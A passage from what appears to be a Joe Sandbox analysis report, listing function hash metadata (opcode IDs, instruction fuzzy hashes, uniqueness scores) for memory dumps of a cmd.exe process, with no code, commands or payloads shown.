                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84a90e9cd33027c22bccafcbaa351a1c4bb1e31a3b03958c026e8a923c2f56e6
                                                                        • Instruction ID: 0be8652fd0d1d7b67d503f3c8a162205ff1bd60879b29d325be953b76b5f937e
                                                                        • Opcode Fuzzy Hash: 84a90e9cd33027c22bccafcbaa351a1c4bb1e31a3b03958c026e8a923c2f56e6
                                                                        • Instruction Fuzzy Hash: 0AC15874208340DFD764CF59C484BABB7E9BF88304F48496DE9898B291D7B4E948CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abb95002f2079573e3285478ae041691f115b35d3001ed21b8acc10fbcd4cbfc
                                                                        • Instruction ID: e126c18bcf68c5cd97786690b4122dcaaa375fead1ac4f8edc571b3eae02911e
                                                                        • Opcode Fuzzy Hash: abb95002f2079573e3285478ae041691f115b35d3001ed21b8acc10fbcd4cbfc
                                                                        • Instruction Fuzzy Hash: E3B16174A012698FEB64DF54C891BB9B3F5EF88700F0485E9D54AEB640EB709DC6CB20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06cb8143056ad0c7f90bef8d79a91a2593bb3e75f068a6e608570aa0a3a7a956
                                                                        • Instruction ID: 486af07a1fbd08b1ca4c70b36434fb320c67040d23baeb5c6a7cd303dad3ec7f
                                                                        • Opcode Fuzzy Hash: 06cb8143056ad0c7f90bef8d79a91a2593bb3e75f068a6e608570aa0a3a7a956
                                                                        • Instruction Fuzzy Hash: E7A14531E00728AFDB25DB98D844FAEBBB5EF0D714F090165E911AB280D7749DA1CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 883fd4f0ce128988095288b1665e52b164e067504790068f26bd15b89d702799
                                                                        • Instruction ID: 26db51b0756b0f3ce599d85101045d20ec5671368377674e2b00cd35f5ec9ce9
                                                                        • Opcode Fuzzy Hash: 883fd4f0ce128988095288b1665e52b164e067504790068f26bd15b89d702799
                                                                        • Instruction Fuzzy Hash: D0A1F370B007169FDB28DF66D990BAAF7B5FF4C314F084129EA459B281EB34E855CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8838fc5dd42c05f79f2d283d54e4db6fbee7428ecc732d14a5b7ef1d6f1fd47
                                                                        • Instruction ID: c0d522a4b013dffadefa3bf075216cfda8ee4d7ee73761587519cffe32ac1369
                                                                        • Opcode Fuzzy Hash: a8838fc5dd42c05f79f2d283d54e4db6fbee7428ecc732d14a5b7ef1d6f1fd47
                                                                        • Instruction Fuzzy Hash: 46A1F972A04711AFC725DF69C980B6AB7EAFF4E344F090928F5899B250DB34EC51CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction ID: 303dba3f38d04a098f0d41156d1475f6c1902b0dfeff5ba72eb41475db70e7e0
                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction Fuzzy Hash: C7B12A75E00619DFDF28CFA9C880AADF7B5BF4D310F188569E825A7354D730A952CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3ddc0570c3451fa80776bd7efe8a04a37ddab37516af1eec73777c66cb23a3e
                                                                        • Instruction ID: 70f87af0e1ad934ba1cc132a068a3b4a56d125f9428cbfee018d7815ef43ebcc
                                                                        • Opcode Fuzzy Hash: a3ddc0570c3451fa80776bd7efe8a04a37ddab37516af1eec73777c66cb23a3e
                                                                        • Instruction Fuzzy Hash: 2991B475D00215AFCB15DF68D894BAEFBB5AF4D700F154169EA14EB341D738D9008FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 51d0f02117d9a4e9a25166593f93ba5cc001b39e4d2dcf859d0cf848eafef5f6
                                                                        • Instruction ID: a98a355519f5b2952438fc364a15951bc1c2991c57fd1a245034104be2a6d1c7
                                                                        • Opcode Fuzzy Hash: 51d0f02117d9a4e9a25166593f93ba5cc001b39e4d2dcf859d0cf848eafef5f6
                                                                        • Instruction Fuzzy Hash: 6B91F179A006158FDB28DB98C880BFDB7A5EB8C710F098475ED05DF644E734D961CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e0d2632ba2585b40e040e1e1c9811d3fe3f161c5b26de0c5e9521730411bfb57
                                                                        • Instruction ID: 7f270ad2e80ed151f36f66d04812e4172b17b24ed4cf16d64b1b589607c02a4d
                                                                        • Opcode Fuzzy Hash: e0d2632ba2585b40e040e1e1c9811d3fe3f161c5b26de0c5e9521730411bfb57
                                                                        • Instruction Fuzzy Hash: 91818F71A00619DBDB18CF69C950ABEBBF9FB4C700F44852EE855E7640E734D940CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction ID: 07b33b26718f58b567dc567321bb4ac540f9ddc1a7a3bae614fb8d90704497d2
                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction Fuzzy Hash: 3E817E35A202499FCF19CF98C890ABEB7B6BF98310F19816DD8169B384DB34E941CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 245b20436f6f57dda1dda9b15661b7b8f81cfe0d377421d60ea92039e8223567
                                                                        • Instruction ID: 9d7d4b92e967f051f1e3caeb8c7c1ab5aad7210c1c82cdbe8b4af94b078a20f7
                                                                        • Opcode Fuzzy Hash: 245b20436f6f57dda1dda9b15661b7b8f81cfe0d377421d60ea92039e8223567
                                                                        • Instruction Fuzzy Hash: EA814C71A00709AFDB25CFA5C880AEEBBBAFF4D354F144429E555A7250D730AC55CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0bb45a887b82a5ae7c7ed80b226d7e02d795b3ff39b5815fbfce67aa7cf2e392
                                                                        • Instruction ID: ad474b340128610adbd1c6bc221cf7f89ab36d45d94e34238456c7fba5eb1909
                                                                        • Opcode Fuzzy Hash: 0bb45a887b82a5ae7c7ed80b226d7e02d795b3ff39b5815fbfce67aa7cf2e392
                                                                        • Instruction Fuzzy Hash: 35719CB68046659FCB29CF98D8506FEBBB5FF5C710F15416AE851AB350E3709860CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c1c0734fb5e21851bc35709378e4d75b0cd102846408cbdd5bec995d09e39d31
                                                                        • Instruction ID: 74eb799679d9071017e5f9f372e5e488000cc3b1d564ebc585b59f8b2d23b74e
                                                                        • Opcode Fuzzy Hash: c1c0734fb5e21851bc35709378e4d75b0cd102846408cbdd5bec995d09e39d31
                                                                        • Instruction Fuzzy Hash: 6B717270900204EFCB14EFA6DA41ADAFBF9FF8D310F14915AE655AB259CB319980CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95a3e4cbb6b8b1109325aaaaaa31dde152b7f6bfbcbd56c65177a168b14001bf
                                                                        • Instruction ID: 41df06a52883c82642c1b756bb70adddd6657182a137e18288ed2cce5b09de72
                                                                        • Opcode Fuzzy Hash: 95a3e4cbb6b8b1109325aaaaaa31dde152b7f6bfbcbd56c65177a168b14001bf
                                                                        • Instruction Fuzzy Hash: 7A71E2356042419FC315DF28C480BAAB7E5FF8C310F0989B9E899CB395DB34D896CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction ID: 80be38e4bb2443bde50f7701cfeadc3ba2346b81924e9c75481697c5c5432992
                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction Fuzzy Hash: B6716D75A00609AFCB11EFA9C984EDEBBB9FF4C700F144569E505AB250DB30EA45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa65e127bddf2a437600b90f55d6eac7924f7582ce6d95d662e26fa2629bad5b
                                                                        • Instruction ID: 192039f8330f2d6e30780f9a90136b312750f2b39f5b1f3b981e1c8f58278b48
                                                                        • Opcode Fuzzy Hash: aa65e127bddf2a437600b90f55d6eac7924f7582ce6d95d662e26fa2629bad5b
                                                                        • Instruction Fuzzy Hash: 34710336200B01EFEB35DF54C844F5AB7E5EF4C760F15482AE21A8B2A0D775E984CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50cb13ac5dc12d88bd6f633dbf4744ddac9c919365c6ec7b2863905b5d0f7a43
                                                                        • Instruction ID: 203b4bcdd6ec0bcde46256e6a97f1a0df0b70660e679adda50ba1652a7a86e99
                                                                        • Opcode Fuzzy Hash: 50cb13ac5dc12d88bd6f633dbf4744ddac9c919365c6ec7b2863905b5d0f7a43
                                                                        • Instruction Fuzzy Hash: F741E436905301DFC718EF5DC940AABB7B5FB8C704F158129D8155B295DBB5D882CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa6568f462558a238d6cda5ba64417738f21abccd30662578d27d5bd28ddfe95
                                                                        • Instruction ID: 502cc0438116142f5757065e1d49235884801fad20457ddc5cb5445cdda3a4d7
                                                                        • Opcode Fuzzy Hash: fa6568f462558a238d6cda5ba64417738f21abccd30662578d27d5bd28ddfe95
                                                                        • Instruction Fuzzy Hash: 0B418A3550D3169FD311DF65C880AABF6E9EF88B54F44492AFA90D7250E730DE148BA3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction ID: f77fabfc049aafd9654cd417590164379995bb24264147f26c4c8a91352c126b
                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction Fuzzy Hash: A3411531B09211EFDB20DFA494407BEB7A1AB88724F19C06BBE59CB640D7358D808F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26692b13f09a4153d487e7c6e918e98f9ca9433e66cff6a3b72d96e052389bc1
                                                                        • Instruction ID: a225fdf654169ab2e8eeb21a0c22924621268c081b8f5cc90b2f76cf8eeaed6b
                                                                        • Opcode Fuzzy Hash: 26692b13f09a4153d487e7c6e918e98f9ca9433e66cff6a3b72d96e052389bc1
                                                                        • Instruction Fuzzy Hash: 57417871A00700EFD724DF18C840B66B7E9FF4D314F25896AE859DB290E7B1E982CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction ID: 63f3eb114e6468c0d48670ddb0862b4a7b21db6047f427fd8b0402fd68361ed5
                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction Fuzzy Hash: B5411775A00705EFDB24CF99C990AAAB7F8FF0D700B1149ADE596EB650D330AA44CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d13768af9178cdc71f57ff6fd49731fd5e2b8dcacd61c2ea4b198dd2025e86a
                                                                        • Instruction ID: e9f4606a6cc3761f510eb1da1ac7f1483ff23cdefd810b94602606e9cf30e2d0
                                                                        • Opcode Fuzzy Hash: 9d13768af9178cdc71f57ff6fd49731fd5e2b8dcacd61c2ea4b198dd2025e86a
                                                                        • Instruction Fuzzy Hash: 0041D274901704DFCB25EF24C904B69B7B6FF4D310F158AA9D9169B2E0DB70A982CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1093694ad2d4334f522e12cddde279ce673c9dfeae19c74efa87c3ede57ab989
                                                                        • Instruction ID: 17e2cded84233ca01fbdd1b39454605813834d604ad66f91f6f35c3b7cfcab91
                                                                        • Opcode Fuzzy Hash: 1093694ad2d4334f522e12cddde279ce673c9dfeae19c74efa87c3ede57ab989
                                                                        • Instruction Fuzzy Hash: 2E416F72908344AFD320EF29C845B9BBBE8FF8D664F004A2EF598D7251D7709945CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bdeb1993e18f1ad21b638a3c7d54a417fb39d8bccd8bc055374205a15a96c641
                                                                        • Instruction ID: 9702089e605a4172f50d950d28d6d498cac417e583716d9e1ce5c0b523dd1808
                                                                        • Opcode Fuzzy Hash: bdeb1993e18f1ad21b638a3c7d54a417fb39d8bccd8bc055374205a15a96c641
